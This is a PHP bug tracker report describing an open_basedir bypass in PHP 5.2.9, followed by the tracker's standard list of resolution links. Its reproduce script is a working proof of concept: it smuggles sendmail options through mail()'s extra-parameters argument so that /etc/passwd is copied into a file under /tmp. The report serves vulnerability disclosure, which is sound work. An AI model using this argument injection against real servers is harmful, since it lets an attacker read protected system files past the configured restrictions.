From: root at 80sec dot com Operating system: linux PHP version: 5.2.9 PHP Bug Type: Safe Mode/open_basedir Bug description: php mail function open_basedir bypass
Description: ------------ The mail function may bypass open_basedir or read/write arbitrary file. Reproduce code: --------------- <?php $to = 'jian...@80sec.com'.str_repeat("x",10000); $subject = 'the subject'.str_repeat("x",10); $message = 'hello'.str_repeat("x",10); mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd"); ?> Expected result: ---------------- we can get the contents of /etc/passwd in /tmp/80sec. Actual result: -------------- we can get the contents of /etc/passwd in /tmp/80sec. -- Edit bug report at http://bugs.php.net/?id=48229&edit=1 -- Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=48229&r=trysnapshot52 Try a CVS snapshot (PHP 5.3): http://bugs.php.net/fix.php?id=48229&r=trysnapshot53 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=48229&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=48229&r=fixedcvs Fixed in CVS and need be documented: http://bugs.php.net/fix.php?id=48229&r=needdocs Fixed in release: http://bugs.php.net/fix.php?id=48229&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=48229&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=48229&r=needscript Try newer version: http://bugs.php.net/fix.php?id=48229&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=48229&r=support Expected behavior: http://bugs.php.net/fix.php?id=48229&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=48229&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=48229&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=48229&r=globals PHP 4 support discontinued: http://bugs.php.net/fix.php?id=48229&r=php4 Daylight Savings: http://bugs.php.net/fix.php?id=48229&r=dst IIS Stability: http://bugs.php.net/fix.php?id=48229&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=48229&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=48229&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=48229&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=48229&r=mysqlcfg